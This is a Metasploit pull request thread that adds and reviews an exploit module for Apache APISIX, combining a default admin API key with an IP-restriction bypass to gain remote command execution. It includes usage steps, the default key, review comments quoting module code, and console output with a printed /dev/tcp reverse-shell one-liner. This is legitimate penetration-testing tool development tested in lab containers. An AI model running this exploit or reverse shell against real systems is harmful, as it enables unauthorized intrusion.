Added Apache APISIX default API Token RCE module
rapid7/metasploit-framework pull request #16248
Opened 2022-02-28 17:44 UTC by heyder

Added module that leverage the default admin API token for Apache APISIX to add malicious route which leads to the remote LUA code execution through the script parameter added in the 2.x version (CVE-2020-13945).

This module has been tested successfully on Apache APISIX 2.11.0.

## Environment
This module was tested using a vulnerable docker container as available on the [vulnhub ](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project. 

```
docker stack deploy -c docker-compose.yml apisix
```

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/apache_apisix_api_default_token_rce`
- [ ] `set payload cmd/unix/reverse_bash`
- [ ] `run rhosts=127.0.0.1 rport=9080 lhost=docker0 lport=4444`

## Output
```
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > run rhosts=127.0.0.1 rport=9080 lhost=docker0 lport=4444

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 127.0.0.1:9080
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.18.0.4:48162 ) at 2022-02-28 18:32:50 +0100
id

uid=99(nobody) gid=99(nobody) groups=99(nobody)
uname -a
Linux 58f5aba16de9 5.16.8-arch1-1 #1 SMP PREEMPT Tue, 08 Feb 2022 21:21:08 +0000 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 127.0.0.1 - Command shell session 1 closed.
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > 
```

2022-03-02 15:26 UTC, smcintyre-r7 requested changes
I left some comments in the code. I was able to test the module and confirm it's working though so we just need a few changes.

Could you also run the msftidy_docs tool, it called out a few improvements that could be made.

<details>
<summary>msftidy_docs output</summary>

```
~ tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md 
documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md - [WARNING] Scenario sub-sections should include the vulnerable application version and OS tested on in an H3, not just ### Version and OS
documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md - [WARNING] Please add a newline at the end of the file
documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md:5 - [WARNING] Line too long (414). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md:7 - [WARNIN
</details>

2022-03-03 08:15 UTC, heyder commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
I'm sure why the framework use netcat as default payload but, using the reverse_bash as default payload in this module make the exploit more reliable.

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    vprint_status("Found an APISIX #{version}")
This needs to check if the regex matched otherwise there'll be a problem because the version won't be available.

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    clean_up(payload_uri) if payload_uri
There's a module-level `cleanup` method that when defined will be called at the very end and would suit this purpose nicely. The advantage would be that it will always be called even if there's a failure in the module. In order to get `payload_uri` into it however, you'll want to define it as an instance variable like `@payload_uri` and then in the cleanup method, check to see if it's defined or nil. When it's nil, you can assume it wasn't created and no cleanup is necessary.

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    data.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
The payload shouldn't be sub'ed into the resulting JSON string but rather placed in the string passed to filter_func before the data is converted to JSON. That's how you do it in `#add_route` and would be the preferred way to avoid any problems where PAYLOAD is in the string where it's not expected to be.

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
```suggestion
      'uri' => normalize_uri(target_uri.path, "'/admin/routes'),
```

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +        path: "#{target_uri.path}/admin/routes/index",
Does this need to be normalized?

```suggestion
        path: normalize_uri(target_uri.path, '/admin/routes/index'),
```

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +        path: "#{target_uri.path}/admin/routes/index",
Does this also need to be normalized with `normalize_uri`?

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    fail_with(Failure::UnexpectedReply, 'Unable to delete the route') unless res.code == 200
If the module has made it this far into the cleanup method, it probably doesn't need to abort with `fail_with`. Printing an error message that the route couldn't be deleted is sufficient.

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
```suggestion
      'uri' => normalize_uri(target_uri.path, '/admin/routes'),
```

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +      timeout: 1500,
Does this need to be user configurable? It's not clear what this timeout is for and if it's seconds or milliseconds?

2022-03-03 15:08 UTC, smcintyre-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    # false # test
This testing comment can be removed.
```suggestion
    res && res.code == 200
```

2022-03-03 18:12 UTC, heyder commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +      timeout: 1500,
It means the amount of time you want to wait until receive an answer from your HTTP [pipeline](https://en.wikipedia.org/wiki/HTTP_pipelining) request and it is optional however the default value is 3000 ms [batch-request doc](https://apisix.apache.org/docs/apisix/plugins/batch-requests/). Not sure if should make it configurable.

2022-03-04 01:35 UTC, heyder reviewed
@smcintyre-r7 there are a lot of changes since your last review, sorry for that, but as I kept researching I've found some cases that I believed would be better to handle, like the other way of execute command by using the `filter_func` and also the possibility of bypass ip-restiction by leveraging the fresh CVE-2022-24112.

2022-03-04 17:38 UTC, smcintyre-r7 commented
I pushed up a change fixing a bunch of typos. I successfully tested the module on versions 2.11.0 and 2.12.1. In both cases though the `batch-requests` plugin was not enabled. Can you provide steps to enable that and leverage the bypass from the newer CVE so I can test that code path as well. Simply enabling the batch-requests plugin in the config doesn't seem to expose the endpoint and the docs mention something about using a public-api plugin to expose it which requires some configuration. Any insight you can provide on that would be really helpful.

2022-03-06 20:35 UTC, heyder commented
@smcintyre-r7 thanks for fixing those typos. Regarding the `batch-request` just adding it to the list of plugins should works, the problem was how the module was checking that, now fixed by the commit [d7c992f](https://github.com/rapid7/metasploit-framework/pull/16248/commits/d7c992f402721a462cb235cfaa284be48deacde5). In the official docker repository from the project https://github.com/apache/apisix-docker you can get a full configuration sample file to play with and also run other versions. I didn't manage run any version below 2.x but I've tested it with all version greater than 2.x and worked.

2022-03-07 14:45 UTC, smcintyre-r7 commented
Yup, that last commit switching the verb to POST fixed it for me. Everything looks good to me now, so I'm going to go ahead and land this. Thanks alot!

```
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > show options 

Module options (exploit/multi/http/apache_apisix_api_default_token_rce):

   Name        Current Setting                   Required  Description
   ----        ---------------                   --------  -----------
   ALLOWED_IP  127.0.0.1                         yes       IP in the allowed list
   API_KEY     edd1c9f034335f136f87ad84b625c8f1  yes       Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.159.128                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT       9080                              yes       The target port (TCP)
   SSL         false                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /apisix                           yes       Path to the APISIX DocumentRoot
   VHOST                                         no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > exploit

[+] bash -c '0<&146-;exec 146<>/dev/tcp/192.168.159.128/4444;sh <&146 >&146 2>&146'
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 192.168.159.128:9080
[+] Can perform authenticated requests through batch requests
[*] Found an APISIX 2.10.4 http server header
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (192.168.159.128:4444 -> 172.19.0.3:56690 ) at 2022-03-07 09:42:27 -0500

id
[*] Deleting route /liz/tacadx

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) >
```

2022-03-07 14:46 UTC, smcintyre-r7 approved these changes

2022-03-07 14:47 UTC, merged

2022-03-07 14:48 UTC, smcintyre-r7 commented
# Release Notes
This adds an unauthenticated exploit targeting Apache APISIX. It leverages two vulnerabilities, the first of which is a default API key and the second is an IP restriction bypass. The result is OS command execution as the service user.